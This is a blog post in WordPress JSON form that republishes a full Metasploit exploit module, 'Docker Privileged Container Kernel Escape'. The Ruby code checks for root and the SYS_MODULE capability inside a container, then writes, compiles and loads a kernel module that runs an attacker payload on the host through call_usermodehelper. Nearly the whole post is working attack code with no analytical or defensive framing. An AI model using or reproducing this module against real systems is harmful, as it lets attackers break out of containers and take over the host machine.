{"id":56670,"date":"2024-05-06T19:09:43","date_gmt":"2024-05-06T15:09:43","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178463\/docker_privileged_container_kernel_escape.rb.txt"},"modified":"2024-05-06T19:09:43","modified_gmt":"2024-05-06T15:09:43","slug":"docker-privileged-container-kernel-escape","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/docker-privileged-container-kernel-escape\/","title":{"rendered":"Docker Privileged Container Kernel Escape"},"content":{"rendered":"

##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking<\/p>\n

prepend Msf::Exploit::Remote::AutoCheck<\/p>\n

include Msf::Post::File
include Msf::Post::Unix
include Msf::Post::Linux::System
include Msf::Post::Linux::Kernel
include Msf::Exploit::FileDropper<\/p>\n

def initialize(info = {})
super(
update_info(
info,
{
‘Name’ => ‘Docker Privileged Container Kernel Escape’,
‘Description’ => %q{
This module performs a container escape onto the host as the daemon
user. It takes advantage of the SYS_MODULE capability. If that
exists and the linux headers are available to compile on the target,
then we can escape onto the host.
},
‘License’ => MSF_LICENSE,
‘Author’ => [
‘Nick Cottrell <Rad10Logic>’, # Module writer
‘Eran Ayalon’, # PoC\/article writer
‘Ilan Sokol’ # PoC\/article writer
],
‘Platform’ => %w[linux unix],
‘Arch’ => [ARCH_CMD],
‘Targets’ => [[‘Automatic’, {}]],
‘DefaultOptions’ => { ‘PrependFork’ => true, ‘WfsDelay’ => 20 },
‘SessionTypes’ => %w[shell meterpreter],
‘DefaultTarget’ => 0,
‘References’ => [
%w[URL https:\/\/www.cybereason.com\/blog\/container-escape-all-you-need-is-cap-capabilities],
%w[URL https:\/\/github.com\/maK-\/reverse-shell-access-kernel-module]],
‘DisclosureDate’ => ‘2014-05-01’, # Went in date of commits in github URL
‘Notes’ => {
‘Stability’ => [ CRASH_SAFE ],
‘Reliability’ => [ REPEATABLE_SESSION ],
‘SideEffects’ => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]}
}
)
)
register_advanced_options([
OptString.new(‘KernelModuleName’, [true, ‘The name that the kernel module will be called in the system’, rand_text_alpha(8)], regex: \/^[\\w-]+$\/),
OptString.new(‘WritableContainerDir’, [true, ‘A directory where we can write files in the container’, “\/tmp\/.#{rand_text_alpha(4)}”])
])
end<\/p>\n

# Check we have all the prerequisites to perform the escape
def check
# Checking database if host has already been disclosed as a container
container_name =
if active_db? && framework.db.workspace.hosts.where(address: session.session_host)&.first&.virtual_host
framework.db.workspace.hosts.where(address: session.session_host)&.first&.virtual_host
else
get_container_type
end<\/p>\n

unless %w[docker podman lxc].include?(container_name.downcase)
return Exploit::CheckCode::Safe(‘Host does not appear to be container of any kind’)
end<\/p>\n

# is root user
unless is_root?
return Exploit::CheckCode::Safe(‘Exploit requires root inside container’)
end<\/p>\n

# Checking if the SYS_MODULE capability is enabled
capability_bitmask = read_file(‘\/proc\/1\/status’)[\/^CapEff:\\s+[0-9a-f]{16}$\/][\/[0-9a-f]{16}$\/].to_i(16)
unless capability_bitmask & 0x0000000000010000 > 0
return Exploit::CheckCode::Safe(‘SYS_MODULE Capability does not appear to be enabled’)
end<\/p>\n

CheckCode::Vulnerable(‘Inside Docker container and target appears vulnerable.’)
end<\/p>\n

def exploit
krelease = kernel_release
# Check if kernel header folders exist
kernel_headers_path = [
“\/lib\/modules\/#{krelease}\/build”,
“\/usr\/src\/kernels\/#{krelease}”
].find { |path| directory?(path) }
unless kernel_headers_path
fail_with(Failure::NoTarget, ‘Kernel headers for this target do not appear to be installed.’)
end
vprint_status(“Kernel headers found at: #{kernel_headers_path}”)<\/p>\n

# Check that our required binaries are installed
unless command_exists?(‘insmod’)
fail_with(Failure::NoTarget, ‘insmod does not appear to be installed.’)
end
unless command_exists?(‘make’)
fail_with(Failure::NoTarget, ‘make does not appear to be installed.’)
end<\/p>\n

# Check that container directory is writable
if directory?(datastore[‘WritableContainerDir’]) && !writable?(datastore[‘WritableContainerDir’])
fail_with(Failure::BadConfig, “#{datastore[‘WritableContainerDir’]} is not writable”)
end<\/p>\n

# Checking that kernel module isn’t already running
if kernel_modules.include?(datastore[‘KernelModuleName’])
fail_with(Failure::BadConfig, “#{datastore[‘KernelModuleName’]} is already loaded into the kernel. You may need to remove it manually.”)
end<\/p>\n

# Creating source files
print_status(‘Creating files…’)
mkdir(datastore[‘WritableContainerDir’]) unless directory?(datastore[‘WritableContainerDir’])<\/p>\n

write_kernel_source(datastore[‘KernelModuleName’], payload.encoded)
write_makefile(datastore[‘KernelModuleName’])
register_files_for_cleanup([
“#{datastore[‘KernelModuleName’]}.c”,
‘Makefile’
].map { |filename| File.join(datastore[‘WritableContainerDir’], filename) })<\/p>\n

# Making exploit
print_status(‘Compiling the kernel module…’)
results = cmd_exec(“make -C ‘#{datastore[‘WritableContainerDir’]}’ KERNEL_DIR=’#{kernel_headers_path}’ PWD=’#{datastore[‘WritableContainerDir’]}'”)
vprint_status(‘Make results’)
vprint_line(results)
register_files_for_cleanup([
‘Module.symvers’,
‘modules.order’,
“#{datastore[‘KernelModuleName’]}.mod”,
“#{datastore[‘KernelModuleName’]}.mod.c”,
“#{datastore[‘KernelModuleName’]}.mod.o”,
“#{datastore[‘KernelModuleName’]}.o”
].map { |filename| File.join(datastore[‘WritableContainerDir’], filename) })<\/p>\n

# Checking if kernel file exists
unless file_exist?(“#{datastore[‘WritableContainerDir’]}\/#{datastore[‘KernelModuleName’]}.ko”)
fail_with(Failure::PayloadFailed, ‘Kernel module did not compile. Run with verbose to see make errors.’)
end
print_good(‘Kernel module compiled successfully’)<\/p>\n

# Loading module and running exploit
print_status(‘Loading kernel module…’)
results = cmd_exec(“insmod ‘#{datastore[‘WritableContainerDir’]}\/#{datastore[‘KernelModuleName’]}.ko'”)<\/p>\n

unless results.blank?
results = results.strip
vprint_status(‘Insmod results: ‘ + (results.count(“\\n”) == 0 ? results : ”))
vprint_line(results) if results.count(“\\n”) > 0
end
end<\/p>\n

def cleanup
# Attempt to remove kernel module
if kernel_modules.include?(datastore[‘KernelModuleName’])
vprint_status(‘Cleaning kernel module’)
cmd_exec(“rmmod #{datastore[‘KernelModuleName’]}”)
end<\/p>\n

# Check that kernel module was removed
if kernel_modules.include?(datastore[‘KernelModuleName’])
print_warning(‘Payload was not a oneshot and cannot be removed until session is ended’)
print_warning(“Kernel module [#{datastore[‘KernelModuleName’]}] will need to be removed manually”)
end
super
end<\/p>\n

def write_kernel_source(filename, payload_content)
file_content = <<~SOURCE
#include<linux\/init.h>
#include<linux\/module.h>
#include<linux\/kmod.h><\/p>\n

MODULE_LICENSE(“GPL”);<\/p>\n

static int start_shell(void){
#{Rex::Text.to_c(payload_content, Rex::Text::DefaultWrap, ‘command’)}
char *argv[] = {“\/bin\/bash”, “-c”, command, NULL};
static char *env[] = {
“HOME=\/”,
“TERM=linux”,
“PATH=\/sbin:\/bin:\/usr\/sbin:\/usr\/bin”, NULL };
return call_usermodehelper(argv[0], argv, env, UMH_WAIT_EXEC);
}<\/p>\n

static int init_mod(void){
return start_shell();
}
static void exit_mod(void){<\/p>\n

return;
}
module_init(init_mod);
module_exit(exit_mod);
SOURCE
filename = “#{filename}.c” unless filename.end_with?(‘.c’)
write_file(File.join(datastore[‘WritableContainerDir’], filename), file_content)
end<\/p>\n

def write_makefile(filename)
file_contents = <<~SOURCE
obj-m +=#{filename}.o<\/p>\n

all:
\\tmake -C $(KERNEL_DIR) M=$(PWD) modules
clean:
\\tmake -C $(KERNEL_DIR) M=$(PWD) clean
SOURCE
write_file(File.join(datastore[‘WritableContainerDir’], ‘Makefile’), file_contents)
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"

### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework##class MetasploitModule < Msf::Exploit::LocalRank = NormalRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Post::Fileinclude Msf::Post::Unixinclude Msf::Post::Linux::Systeminclude Msf::Post::Linux::Kernelinclude Msf::Exploit::FileDropper def initialize(info = {})super(update_info(info,{‘Name’ => ‘Docker Privileged Container Kernel Escape’,‘Description’ => %q{This module performs a container escape onto the host as the daemonuser. It takes advantage of the SYS_MODULE capability. If thatexists and …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56670","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56670","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56670"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56670\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56670"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56670"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56670"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}